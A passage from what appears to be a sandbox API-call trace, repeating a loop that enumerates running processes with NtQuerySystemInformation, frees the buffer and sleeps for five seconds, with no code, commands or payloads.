returned 0x0 [0236.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.483] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.490] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.503] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.510] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.590] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.597] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.611] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.619] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.627] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.652] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.666] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.673] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 